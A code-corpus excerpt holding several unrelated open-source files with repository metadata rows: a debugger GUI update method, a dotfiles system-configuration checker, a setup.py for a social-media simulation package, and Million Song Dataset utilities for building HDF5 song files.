def actBreak(self):
if self.debugger:
self.debugger.actBreak()
def actStop(self):
if self.debugger:
self.debugger.actStop()
def update(self):
""" Called every 50ms to check if a change in debugger state occurred
Basically this is waiting for a change of state, indicated by:
* self.debugger.changed
If a change is detected, everything is re-evaluated and drawn
"""
if self.debugger:
self.debugger.update()
#if len(text)>0:
# self.addOutputText(text)
if self.debugger.hasOutput():
self.addOutputText(self.debugger.getOutput())
if self.debugger.changed:
self.updatePosition()
self.updateWatches()
self.updateLocals()
self.updateCallstack()
self.debugger.changed=False
if not self.debugger.running:
self.stopDebugger()
# If the debugger is active running the program,
# create an indication using an animation in the top left
# corner of the application window
if self.debugger and self.debugger.active:
if self.runningWidget is None:
from running import RunningWidget
self.runningWidget=RunningWidget(self)
self.runningWidget.show()
self.outputEdit.setBlinkingCursor(True)
s=self.outputEdit.getInput()
if len(s)>0:
text=''.join(s)
self.debugger.sendInput(text)
self.addOutputText(text)
else:
self.outputEdit.clearInput()
self.outputEdit.setBlinkingCursor(False)
if not self.runningWidget is None:
self.runningWidget.close()
self.runningWidget=None
|
gpl-2.0
| -3,514,037,278,721,606,700
| 36.664583
| 135
| 0.576286
| false
| 4.162791
| true
| false
| false
|
pradyunsg/dotfiles
|
lib/checker.py
|
1
|
5820
|
import os
import sys
import shutil
import platform
from .logging import Logger, log
from .utils import run_output
import click
import yaml
class SystemChecker(object):
"""A super-fancy helper for checking the system configuration
"""
def __init__(self, verbose):
super().__init__()
self._logger = Logger()
self.verbose = verbose
def _log_happy(self, msg):
self._logger.spaced_status("pass", msg, fit_width=4)
def _log_angry(self, msg, is_warning):
if is_warning:
self._logger.spaced_status("warn", msg, fit_width=4)
else:
self._logger.spaced_status("fail", msg, fit_width=4)
def platform(self):
return platform.system()
def equal(self, expected, *, should_warn=False, **kwargs):
"""Check if a given value for something is equal to the expected value.
checker.equal(value, name=from_system)
"""
assert len(kwargs) == 1, "expected 1 keyword argument"
name, value = next(iter(kwargs.items()))
if value == expected:
self._log_happy(name + " is correct")
else:
self._log_angry(
f"{name} is not {expected!r}, it is {value!r}",
is_warning=should_warn,
)
# The actual logic is below
def run(self, fname):
data = self._load_yaml(fname)
self._check_username(data["identity"]["username"])
self._check_ssh(data["identity"]["ssh-key"])
self._check_gpg(data["identity"]["gpg-key"])
for category, contents in data["things"].items():
self._check_category(category, contents, data)
def _load_yaml(self, fname):
with open(fname) as f:
try:
return yaml.safe_load(f)
except Exception as e:
click.secho("ERROR: Could not parse file.", fg="red")
click.secho(str(e), fg="red")
sys.exit(1)
def _check_username(self, expected):
self.equal(expected, Username=os.environ["USER"])
def _check_ssh(self, expected):
# FIXME: Is this fragile?
output = run_output("ssh-keygen -E md5 -lf {}".format(
os.path.expanduser("~/.ssh/id_rsa.pub")
))
if output is None:
ssh_key = "not found"
else:
ssh_key = output.split()[1]
if ssh_key.startswith("MD5:"):
ssh_key = ssh_key[4:]
self.equal(expected, **{"SSH key": ssh_key})
def _check_gpg(self, expected):
# This checks that the GPG key exists in the dB
output = run_output("gpg --list-keys {}".format(expected))
if output is not None:
self.equal(expected, **{"GPG key": expected})
else:
self.equal(expected, **{"GPG key": "not found"})
def _check_category(self, category, contents, data):
if "if" in contents:
if list(contents["if"]) != ["platform"]:
raise ValueError(
"Needed condition of category {} to be 'platform'"
.format(category)
)
if contents["if"]["platform"] != self.platform():
log.spaced_status("skip", category)
return
log.spaced_status("topic", category, fit_width=5)
with log:
self._check_executables(
category, contents.get("executables", None)
)
self._check_run_items(
category, contents.get("run_check", None), data
)
def _check_executables(self, category, executables):
if not executables:
return
# Convert the string to a list.
executables = list(map(lambda x: x.strip(), executables.split(",")))
missing = set()
for fname in executables:
if shutil.which(fname) is None:
missing.add(fname)
verb = lambda x: "executable" if len(x) == 1 else "executables"
if missing:
desc = "missing {}: {}".format(
verb(missing), ", ".join(map(repr, missing))
)
log.spaced_status("fail", desc, fit_width=4)
else:
log.spaced_status(
"pass",
"{} {} available".format(len(executables), verb(executables)),
fit_width=4,
)
def _check_run_items(self, category, run_items, data):
if not run_items:
return
for name, cmd_dict in run_items.items():
if not isinstance(cmd_dict, dict) or "cmd" not in cmd_dict:
log.spaced_status(
"warn", f"!!! invalid !!! {category} {name}",
fit_width=4
)
continue
got = run_output(cmd_dict["cmd"])
if got is None:
# Did not exit cleanly
ok = False
reason = "command did not succeed"
elif "equal" in cmd_dict:
# Match the output against an expected value...
expected = cmd_dict["equal"]
# Perform substitution (from values earlier in the dict)
if expected.startswith("$"):
expected = _dotted_access(data, expected[1:])
ok = expected == got.rstrip()
reason = f"{expected!r} != {got!r}"
if ok:
log.spaced_status("pass", name, fit_width=4)
else:
log.spaced_status("fail", name, fit_width=4)
if self.verbose:
with log:
log.info(reason)
def _dotted_access(data, spec):
item = data
for part in spec.split("."):
item = item[part]
return item
|
mit
| -4,368,949,340,365,042,700
| 30.978022
| 79
| 0.518041
| false
| 4.157143
| false
| false
| false
|
peterrenshaw/socsim
|
setup.py
|
1
|
1400
|
#!/usr/bin/env python
# ~*~ encoding: utf-8 ~*~
"""
This file is part of SOCSIM.
SOCSIM is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SOCSIM is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with SOCSIM. If not, see <http://www.gnu.org/licenses/>.
"""
import os
from setuptools import setup
from setuptools import find_packages
from socsim import __version__
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(name = "socsim",
version = __version__,
description = 'social media simulation tools',
long_description=read('README'),
license = 'GNU GPL 3.0',
author = "Peter Renshaw",
author_email = "goonmail@netspace.net.au",
url = 'https://github.com/peterrenshaw/socsim',
packages = find_packages(),
keywords = ['message','testing','human','response'],
zip_safe = True)
# vim: ff=unix:ts=4:sw=4:tw=78:noai:expandtab
|
gpl-3.0
| -4,294,559,742,352,133,000
| 30.111111
| 72
| 0.682143
| false
| 3.763441
| false
| false
| false
|
judaba13/GenrePredictor
|
hdf5_utils.py
|
1
|
28730
|
"""
Thierry Bertin-Mahieux (2010) Columbia University
tb2332@columbia.edu
This code contains a set of routines to create HDF5 files containing
features and metadata of a song.
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2010, Thierry Bertin-Mahieux
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import numpy as np
# code relies on pytables, see http://www.pytables.org
import tables
import hdf5_descriptors as DESC
from hdf5_getters import *
# musicbrainz related stuff
try:
from MBrainzDB import query as QUERYMB
except ImportError:
print 'need pg module and MBrainzDB folder of Python source code if you'
print 'want to use musicbrainz related functions, e.g. fill_hdf5_from_musicbrainz'
# description of the different arrays in the song file
ARRAY_DESC_SIMILAR_ARTISTS = 'array of similar artists Echo Nest id'
ARRAY_DESC_ARTIST_TERMS = 'array of terms (Echo Nest tags) for an artist'
ARRAY_DESC_ARTIST_TERMS_FREQ = 'array of term (Echo Nest tags) frequencies for an artist'
ARRAY_DESC_ARTIST_TERMS_WEIGHT = 'array of term (Echo Nest tags) weights for an artist'
ARRAY_DESC_SEGMENTS_START = 'array of start times of segments'
ARRAY_DESC_SEGMENTS_CONFIDENCE = 'array of confidence of segments'
ARRAY_DESC_SEGMENTS_PITCHES = 'array of pitches of segments (chromas)'
ARRAY_DESC_SEGMENTS_TIMBRE = 'array of timbre of segments (MFCC-like)'
ARRAY_DESC_SEGMENTS_LOUDNESS_MAX = 'array of max loudness of segments'
ARRAY_DESC_SEGMENTS_LOUDNESS_MAX_TIME = 'array of max loudness time of segments'
ARRAY_DESC_SEGMENTS_LOUDNESS_START = 'array of loudness of segments at start time'
ARRAY_DESC_SECTIONS_START = 'array of start times of sections'
ARRAY_DESC_SECTIONS_CONFIDENCE = 'array of confidence of sections'
ARRAY_DESC_BEATS_START = 'array of start times of beats'
ARRAY_DESC_BEATS_CONFIDENCE = 'array of confidence of sections'
ARRAY_DESC_BARS_START = 'array of start times of bars'
ARRAY_DESC_BARS_CONFIDENCE = 'array of confidence of bars'
ARRAY_DESC_TATUMS_START = 'array of start times of tatums'
ARRAY_DESC_TATUMS_CONFIDENCE = 'array of confidence of tatums'
ARRAY_DESC_ARTIST_MBTAGS = 'array of tags from MusicBrainz for an artist'
ARRAY_DESC_ARTIST_MBTAGS_COUNT = 'array of tag counts from MusicBrainz for an artist'
def fill_hdf5_from_artist(h5,artist):
"""
Fill an open hdf5 using all content in a artist object
from the Echo Nest python API
There could be overlap with fill_from_song and fill_from_track,
we assume the data is consistent!
"""
# get the metadata table, fill it
metadata = h5.root.metadata.songs
metadata.cols.artist_id[0] = artist.id
idsplitter = lambda x,y: x.split(':')[2] if x else y
metadata.cols.artist_mbid[0] = idsplitter(artist.get_foreign_id(idspace='musicbrainz'),'')
metadata.cols.artist_playmeid[0] = int(idsplitter(artist.get_foreign_id(idspace='playme'),-1))
metadata.cols.artist_7digitalid[0] = int(idsplitter(artist.get_foreign_id(idspace='7digital'),-1))
# fill the metadata arrays
group = h5.root.metadata
metadata.cols.idx_similar_artists[0] = 0
group.similar_artists.append( np.array(map(lambda x : x.id,artist.get_similar(results=100)),dtype='string') )
metadata.cols.idx_artist_terms[0] = 0
group.artist_terms.append( np.array(map(lambda x : x.name,artist.get_terms()),dtype='string') )
group.artist_terms_freq.append( np.array(map(lambda x : x.frequency,artist.get_terms()),dtype='float64') )
group.artist_terms_weight.append( np.array(map(lambda x : x.weight,artist.get_terms()),dtype='float64') )
# done, flush
metadata.flush()
def fill_hdf5_from_song(h5,song):
"""
Fill an open hdf5 using all the content in a song object
from the Echo Nest python API.
Usually, fill_hdf5_from_track() will have been called first.
"""
# get the metadata table, fill it
metadata = h5.root.metadata.songs
metadata.cols.artist_familiarity[0] = song.get_artist_familiarity()
metadata.cols.artist_hotttnesss[0] = song.get_artist_hotttnesss()
metadata.cols.artist_id[0] = song.artist_id
metadata.cols.artist_latitude[0] = song.get_artist_location().latitude
metadata.cols.artist_location[0] = song.get_artist_location().location.encode('utf-8') if song.get_artist_location().location else ''
metadata.cols.artist_longitude[0] = song.get_artist_location().longitude
metadata.cols.artist_name[0] = song.artist_name.encode('utf-8') if song.artist_name else ''
metadata.cols.song_id[0] = song.id
metadata.cols.song_hotttnesss[0] = song.get_song_hotttnesss()
metadata.cols.title[0] = song.title.encode('utf-8') if song.title else ''
metadata.flush()
# get the analysis table
analysis = h5.root.analysis.songs
analysis.danceability = song.get_audio_summary().danceability
analysis.energy = song.get_audio_summary().energy
analysis.flush()
def fill_hdf5_from_track(h5,track):
"""
Fill an open hdf5 using all the content in a track object
from the Echo Nest python API
"""
# get the metadata table, fill it
metadata = h5.root.metadata.songs
#metadata.cols.analyzer_version[0] = track.analyzer_version
metadata.cols.artist_name[0] = getattr(track, 'artist', u'').encode('utf-8')
metadata.cols.release[0] = getattr(track, 'release', u'').encode('utf-8')
metadata.cols.title[0] = getattr(track, 'title', u'').encode('utf-8')
idsplitter_7digital = lambda x: int(x.split(':')[2]) if x and x.split(':')[0]=='7digital' else -1
metadata.cols.release_7digitalid[0] = idsplitter_7digital(track.foreign_release_id)
metadata.cols.track_7digitalid[0] = idsplitter_7digital(track.foreign_id)
metadata.flush()
# get the analysis table, fill it
analysis = h5.root.analysis.songs
analysis.cols.analysis_sample_rate[0] = track.analysis_sample_rate
analysis.cols.audio_md5[0] = track.audio_md5
analysis.cols.duration[0] = track.duration
analysis.cols.end_of_fade_in[0] = track.end_of_fade_in
analysis.cols.key[0] = track.key
analysis.cols.key_confidence[0] = track.key_confidence
analysis.cols.loudness[0] = track.loudness
analysis.cols.mode[0] = track.mode
analysis.cols.mode_confidence[0] = track.mode_confidence
analysis.cols.start_of_fade_out[0] = track.start_of_fade_out
analysis.cols.tempo[0] = track.tempo
analysis.cols.time_signature[0] = track.time_signature
analysis.cols.time_signature_confidence[0] = track.time_signature_confidence
analysis.cols.track_id[0] = track.id
analysis.flush()
group = h5.root.analysis
# analysis arrays (segments)
analysis.cols.idx_segments_start[0] = 0
group.segments_start.append( np.array(map(lambda x : x['start'],track.segments),dtype='float64') )
analysis.cols.idx_segments_confidence[0] = 0
group.segments_confidence.append( np.array(map(lambda x : x['confidence'],track.segments),dtype='float64') )
analysis.cols.idx_segments_pitches[0] = 0
group.segments_pitches.append( np.array(map(lambda x : x['pitches'],track.segments),dtype='float64') )
analysis.cols.idx_segments_timbre[0] = 0
group.segments_timbre.append( np.array(map(lambda x : x['timbre'],track.segments),dtype='float64') )
analysis.cols.idx_segments_loudness_max[0] = 0
group.segments_loudness_max.append( np.array(map(lambda x : x['loudness_max'],track.segments),dtype='float64') )
analysis.cols.idx_segments_loudness_max_time[0] = 0
group.segments_loudness_max_time.append( np.array(map(lambda x : x['loudness_max_time'],track.segments),dtype='float64') )
analysis.cols.idx_segments_loudness_start[0] = 0
group.segments_loudness_start.append( np.array(map(lambda x : x['loudness_start'],track.segments),dtype='float64') )
# analysis arrays (sections)
analysis.cols.idx_sections_start[0] = 0
group.sections_start.append( np.array(map(lambda x : x['start'],track.sections),dtype='float64') )
analysis.cols.idx_sections_confidence[0] = 0
group.sections_confidence.append( np.array(map(lambda x : x['confidence'],track.sections),dtype='float64') )
# analysis arrays (beats
analysis.cols.idx_beats_start[0] = 0
group.beats_start.append( np.array(map(lambda x : x['start'],track.beats),dtype='float64') )
analysis.cols.idx_beats_confidence[0] = 0
group.beats_confidence.append( np.array(map(lambda x : x['confidence'],track.beats),dtype='float64') )
# analysis arrays (bars)
analysis.cols.idx_bars_start[0] = 0
group.bars_start.append( np.array(map(lambda x : x['start'],track.bars),dtype='float64') )
analysis.cols.idx_bars_confidence[0] = 0
group.bars_confidence.append( np.array(map(lambda x : x['confidence'],track.bars),dtype='float64') )
# analysis arrays (tatums)
analysis.cols.idx_tatums_start[0] = 0
group.tatums_start.append( np.array(map(lambda x : x['start'],track.tatums),dtype='float64') )
analysis.cols.idx_tatums_confidence[0] = 0
group.tatums_confidence.append( np.array(map(lambda x : x['confidence'],track.tatums),dtype='float64') )
analysis.flush()
# DONE
def fill_hdf5_from_musicbrainz(h5,connect):
"""
Fill an open hdf5 using the musicbrainz server and data.
We assume this code is run after fill_hdf5_from_artist/song
because we need artist_mbid, artist_name, release and title
INPUT
h5 - open song file (append mode)
connect - open pg connection to musicbrainz_db
"""
# get info from h5 song file
ambid = h5.root.metadata.songs.cols.artist_mbid[0]
artist_name = h5.root.metadata.songs.cols.artist_name[0]
release = h5.root.metadata.songs.cols.release[0]
title = h5.root.metadata.songs.cols.title[0]
# get the musicbrainz table, fill it
musicbrainz = h5.root.musicbrainz.songs
musicbrainz.cols.year[0] = QUERYMB.find_year_safemode(connect,ambid,title,release,artist_name)
# fill the musicbrainz arrays
group = h5.root.musicbrainz
musicbrainz.cols.idx_artist_mbtags[0] = 0
tags,tagcount = QUERYMB.get_artist_tags(connect, ambid, maxtags=20)
group.artist_mbtags.append( np.array(tags,dtype='string') )
group.artist_mbtags_count.append( np.array(tagcount,dtype='float64') )
# done, flush
musicbrainz.flush()
def fill_hdf5_aggregate_file(h5,h5_filenames,summaryfile=False):
"""
Fill an open hdf5 aggregate file using all the content from all the HDF5 files
listed as filenames. These HDF5 files are supposed to be filled already.
Usefull to create one big HDF5 file from many, thus improving IO speed.
For most of the info, we simply use one row per song.
For the arrays (e.g. segment_start) we need the indecies (e.g. idx_segment_start)
to know which part of the array belongs to one particular song.
If summaryfile=True, we skip arrays (indices all 0)
"""
# counter
counter = 0
# iterate over filenames
for h5idx,h5filename in enumerate(h5_filenames):
# open h5 file
h5tocopy = open_h5_file_read(h5filename)
# get number of songs in new file
nSongs = get_num_songs(h5tocopy)
# iterate over songs in one HDF5 (1 if regular file, more if aggregate file)
for songidx in xrange(nSongs):
# METADATA
row = h5.root.metadata.songs.row
row["artist_familiarity"] = get_artist_familiarity(h5tocopy,songidx)
row["artist_hotttnesss"] = get_artist_hotttnesss(h5tocopy,songidx)
row["artist_id"] = get_artist_id(h5tocopy,songidx)
row["artist_mbid"] = get_artist_mbid(h5tocopy,songidx)
row["artist_playmeid"] = get_artist_playmeid(h5tocopy,songidx)
row["artist_7digitalid"] = get_artist_7digitalid(h5tocopy,songidx)
row["artist_latitude"] = get_artist_latitude(h5tocopy,songidx)
row["artist_location"] = get_artist_location(h5tocopy,songidx)
row["artist_longitude"] = get_artist_longitude(h5tocopy,songidx)
row["artist_name"] = get_artist_name(h5tocopy,songidx)
row["release"] = get_release(h5tocopy,songidx)
row["release_7digitalid"] = get_release_7digitalid(h5tocopy,songidx)
row["song_id"] = get_song_id(h5tocopy,songidx)
row["song_hotttnesss"] = get_song_hotttnesss(h5tocopy,songidx)
row["title"] = get_title(h5tocopy,songidx)
row["track_7digitalid"] = get_track_7digitalid(h5tocopy,songidx)
# INDICES
if not summaryfile:
if counter == 0 : # we're first row
row["idx_similar_artists"] = 0
row["idx_artist_terms"] = 0
else:
row["idx_similar_artists"] = h5.root.metadata.similar_artists.shape[0]
row["idx_artist_terms"] = h5.root.metadata.artist_terms.shape[0]
row.append()
h5.root.metadata.songs.flush()
# ARRAYS
if not summaryfile:
h5.root.metadata.similar_artists.append( get_similar_artists(h5tocopy,songidx) )
h5.root.metadata.artist_terms.append( get_artist_terms(h5tocopy,songidx) )
h5.root.metadata.artist_terms_freq.append( get_artist_terms_freq(h5tocopy,songidx) )
h5.root.metadata.artist_terms_weight.append( get_artist_terms_weight(h5tocopy,songidx) )
# ANALYSIS
row = h5.root.analysis.songs.row
row["analysis_sample_rate"] = get_analysis_sample_rate(h5tocopy,songidx)
row["audio_md5"] = get_audio_md5(h5tocopy,songidx)
row["danceability"] = get_danceability(h5tocopy,songidx)
row["duration"] = get_duration(h5tocopy,songidx)
row["end_of_fade_in"] = get_end_of_fade_in(h5tocopy,songidx)
row["energy"] = get_energy(h5tocopy,songidx)
row["key"] = get_key(h5tocopy,songidx)
row["key_confidence"] = get_key_confidence(h5tocopy,songidx)
row["loudness"] = get_loudness(h5tocopy,songidx)
row["mode"] = get_mode(h5tocopy,songidx)
row["mode_confidence"] = get_mode_confidence(h5tocopy,songidx)
row["start_of_fade_out"] = get_start_of_fade_out(h5tocopy,songidx)
row["tempo"] = get_tempo(h5tocopy,songidx)
row["time_signature"] = get_time_signature(h5tocopy,songidx)
row["time_signature_confidence"] = get_time_signature_confidence(h5tocopy,songidx)
row["track_id"] = get_track_id(h5tocopy,songidx)
# INDICES
if not summaryfile:
if counter == 0 : # we're first row
row["idx_segments_start"] = 0
row["idx_segments_confidence"] = 0
row["idx_segments_pitches"] = 0
row["idx_segments_timbre"] = 0
row["idx_segments_loudness_max"] = 0
row["idx_segments_loudness_max_time"] = 0
row["idx_segments_loudness_start"] = 0
row["idx_sections_start"] = 0
row["idx_sections_confidence"] = 0
row["idx_beats_start"] = 0
row["idx_beats_confidence"] = 0
row["idx_bars_start"] = 0
row["idx_bars_confidence"] = 0
row["idx_tatums_start"] = 0
row["idx_tatums_confidence"] = 0
else : # check the current shape of the arrays
row["idx_segments_start"] = h5.root.analysis.segments_start.shape[0]
row["idx_segments_confidence"] = h5.root.analysis.segments_confidence.shape[0]
row["idx_segments_pitches"] = h5.root.analysis.segments_pitches.shape[0]
row["idx_segments_timbre"] = h5.root.analysis.segments_timbre.shape[0]
row["idx_segments_loudness_max"] = h5.root.analysis.segments_loudness_max.shape[0]
row["idx_segments_loudness_max_time"] = h5.root.analysis.segments_loudness_max_time.shape[0]
row["idx_segments_loudness_start"] = h5.root.analysis.segments_loudness_start.shape[0]
row["idx_sections_start"] = h5.root.analysis.sections_start.shape[0]
row["idx_sections_confidence"] = h5.root.analysis.sections_confidence.shape[0]
row["idx_beats_start"] = h5.root.analysis.beats_start.shape[0]
row["idx_beats_confidence"] = h5.root.analysis.beats_confidence.shape[0]
row["idx_bars_start"] = h5.root.analysis.bars_start.shape[0]
row["idx_bars_confidence"] = h5.root.analysis.bars_confidence.shape[0]
row["idx_tatums_start"] = h5.root.analysis.tatums_start.shape[0]
row["idx_tatums_confidence"] = h5.root.analysis.tatums_confidence.shape[0]
row.append()
h5.root.analysis.songs.flush()
# ARRAYS
if not summaryfile:
h5.root.analysis.segments_start.append( get_segments_start(h5tocopy,songidx) )
h5.root.analysis.segments_confidence.append( get_segments_confidence(h5tocopy,songidx) )
h5.root.analysis.segments_pitches.append( get_segments_pitches(h5tocopy,songidx) )
h5.root.analysis.segments_timbre.append( get_segments_timbre(h5tocopy,songidx) )
h5.root.analysis.segments_loudness_max.append( get_segments_loudness_max(h5tocopy,songidx) )
h5.root.analysis.segments_loudness_max_time.append( get_segments_loudness_max_time(h5tocopy,songidx) )
h5.root.analysis.segments_loudness_start.append( get_segments_loudness_start(h5tocopy,songidx) )
h5.root.analysis.sections_start.append( get_sections_start(h5tocopy,songidx) )
h5.root.analysis.sections_confidence.append( get_sections_confidence(h5tocopy,songidx) )
h5.root.analysis.beats_start.append( get_beats_start(h5tocopy,songidx) )
h5.root.analysis.beats_confidence.append( get_beats_confidence(h5tocopy,songidx) )
h5.root.analysis.bars_start.append( get_bars_start(h5tocopy,songidx) )
h5.root.analysis.bars_confidence.append( get_bars_confidence(h5tocopy,songidx) )
h5.root.analysis.tatums_start.append( get_tatums_start(h5tocopy,songidx) )
h5.root.analysis.tatums_confidence.append( get_tatums_confidence(h5tocopy,songidx) )
# MUSICBRAINZ
row = h5.root.musicbrainz.songs.row
row["year"] = get_year(h5tocopy,songidx)
# INDICES
if not summaryfile:
if counter == 0 : # we're first row
row["idx_artist_mbtags"] = 0
else:
row["idx_artist_mbtags"] = h5.root.musicbrainz.artist_mbtags.shape[0]
row.append()
h5.root.musicbrainz.songs.flush()
# ARRAYS
if not summaryfile:
h5.root.musicbrainz.artist_mbtags.append( get_artist_mbtags(h5tocopy,songidx) )
h5.root.musicbrainz.artist_mbtags_count.append( get_artist_mbtags_count(h5tocopy,songidx) )
# counter
counter += 1
# close h5 file
h5tocopy.close()
def create_song_file(h5filename,title='H5 Song File',force=False,complevel=1):
"""
Create a new HDF5 file for a new song.
If force=False, refuse to overwrite an existing file
Raise a ValueError if it's the case.
Other optional param is the H5 file.
Setups the groups, each containing a table 'songs' with one row:
- metadata
- analysis
DETAIL
- we set the compression level to 1 by default, it uses the ZLIB library
to disable compression, set it to 0
"""
# check if file exists
if not force:
if os.path.exists(h5filename):
raise ValueError('file exists, can not create HDF5 song file')
# create the H5 file
h5 = tables.openFile(h5filename, mode='w', title='H5 Song File')
# set filter level
h5.filters = tables.Filters(complevel=complevel,complib='zlib')
# setup the groups and tables
# group metadata
group = h5.createGroup("/",'metadata','metadata about the song')
table = h5.createTable(group,'songs',DESC.SongMetaData,'table of metadata for one song')
r = table.row
r.append() # filled with default values 0 or '' (depending on type)
table.flush()
# group analysis
group = h5.createGroup("/",'analysis','Echo Nest analysis of the song')
table = h5.createTable(group,'songs',DESC.SongAnalysis,'table of Echo Nest analysis for one song')
r = table.row
r.append() # filled with default values 0 or '' (depending on type)
table.flush()
# group musicbrainz
group = h5.createGroup("/",'musicbrainz','data about the song coming from MusicBrainz')
table = h5.createTable(group,'songs',DESC.SongMusicBrainz,'table of data coming from MusicBrainz')
r = table.row
r.append() # filled with default values 0 or '' (depending on type)
table.flush()
# create arrays
create_all_arrays(h5,expectedrows=3)
# close it, done
h5.close()
def create_aggregate_file(h5filename,title='H5 Aggregate File',force=False,expectedrows=1000,complevel=1,
summaryfile=False):
"""
Create a new HDF5 file for all songs.
It will contains everything that are in regular song files.
Tables created empty.
If force=False, refuse to overwrite an existing file
Raise a ValueError if it's the case.
If summaryfile=True, creates a sumary file, i.e. no arrays
Other optional param is the H5 file.
DETAILS
- if you create a very large file, try to approximate correctly
the number of data points (songs), it speeds things up with arrays (by
setting the chunking correctly).
- we set the compression level to 1 by default, it uses the ZLIB library
to disable compression, set it to 0
Setups the groups, each containing a table 'songs' with one row:
- metadata
- analysis
"""
# check if file exists
if not force:
if os.path.exists(h5filename):
raise ValueError('file exists, can not create HDF5 song file')
# summary file? change title
if summaryfile:
title = 'H5 Summary File'
# create the H5 file
h5 = tables.openFile(h5filename, mode='w', title='H5 Song File')
# set filter level
h5.filters = tables.Filters(complevel=complevel,complib='zlib')
# setup the groups and tables
# group metadata
group = h5.createGroup("/",'metadata','metadata about the song')
table = h5.createTable(group,'songs',DESC.SongMetaData,'table of metadata for one song',
expectedrows=expectedrows)
# group analysis
group = h5.createGroup("/",'analysis','Echo Nest analysis of the song')
table = h5.createTable(group,'songs',DESC.SongAnalysis,'table of Echo Nest analysis for one song',
expectedrows=expectedrows)
# group musicbrainz
group = h5.createGroup("/",'musicbrainz','data about the song coming from MusicBrainz')
table = h5.createTable(group,'songs',DESC.SongMusicBrainz,'table of data coming from MusicBrainz',
expectedrows=expectedrows)
# create arrays
if not summaryfile:
create_all_arrays(h5,expectedrows=expectedrows)
# close it, done
h5.close()
def create_all_arrays(h5,expectedrows=1000):
"""
Utility functions used by both create_song_file and create_aggregate_files,
creates all the EArrays (empty).
INPUT
h5 - hdf5 file, open with write or append permissions
metadata and analysis groups already exist!
"""
# group metadata arrays
group = h5.root.metadata
h5.createEArray(where=group,name='similar_artists',atom=tables.StringAtom(20,shape=()),shape=(0,),title=ARRAY_DESC_SIMILAR_ARTISTS)
h5.createEArray(group,'artist_terms',tables.StringAtom(256,shape=()),(0,),ARRAY_DESC_ARTIST_TERMS,
expectedrows=expectedrows*40)
h5.createEArray(group,'artist_terms_freq',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_ARTIST_TERMS_FREQ,
expectedrows=expectedrows*40)
h5.createEArray(group,'artist_terms_weight',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_ARTIST_TERMS_WEIGHT,
expectedrows=expectedrows*40)
# group analysis arrays
group = h5.root.analysis
h5.createEArray(where=group,name='segments_start',atom=tables.Float64Atom(shape=()),shape=(0,),title=ARRAY_DESC_SEGMENTS_START)
h5.createEArray(group,'segments_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_pitches',tables.Float64Atom(shape=()),(0,12),ARRAY_DESC_SEGMENTS_PITCHES,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_timbre',tables.Float64Atom(shape=()),(0,12),ARRAY_DESC_SEGMENTS_TIMBRE,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_loudness_max',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_LOUDNESS_MAX,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_loudness_max_time',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_LOUDNESS_MAX_TIME,
expectedrows=expectedrows*300)
h5.createEArray(group,'segments_loudness_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SEGMENTS_LOUDNESS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'sections_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SECTIONS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'sections_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_SECTIONS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'beats_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BEATS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'beats_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BEATS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'bars_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BARS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'bars_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_BARS_CONFIDENCE,
expectedrows=expectedrows*300)
h5.createEArray(group,'tatums_start',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_TATUMS_START,
expectedrows=expectedrows*300)
h5.createEArray(group,'tatums_confidence',tables.Float64Atom(shape=()),(0,),ARRAY_DESC_TATUMS_CONFIDENCE,
expectedrows=expectedrows*300)
# group musicbrainz arrays
group = h5.root.musicbrainz
h5.createEArray(where=group,name='artist_mbtags',atom=tables.StringAtom(256,shape=()),shape=(0,),title=ARRAY_DESC_ARTIST_MBTAGS,
expectedrows=expectedrows*5)
h5.createEArray(group,'artist_mbtags_count',tables.IntAtom(shape=()),(0,),ARRAY_DESC_ARTIST_MBTAGS_COUNT,
expectedrows=expectedrows*5)
def open_h5_file_read(h5filename):
"""
Open an existing H5 in read mode.
"""
return tables.openFile(h5filename, mode='r')
def open_h5_file_append(h5filename):
"""
Open an existing H5 in append mode.
"""
return tables.openFile(h5filename, mode='a')
################################################ MAIN #####################################
def die_with_usage():
""" HELP MENU """
print 'hdf5_utils.py'
print 'by T. Bertin-Mahieux (2010) Columbia University'
print ''
print 'should be used as a library, contains functions to create'
print 'HDF5 files for the Million Song Dataset project'
sys.exit(0)
if __name__ == '__main__':
# help menu
die_with_usage()
|
apache-2.0
| 7,055,382,129,776,609,000
| 52.304267
| 137
| 0.664636
| false
| 3.349656
| false
| false
| false
|
blab/antibody-response-pulse
|
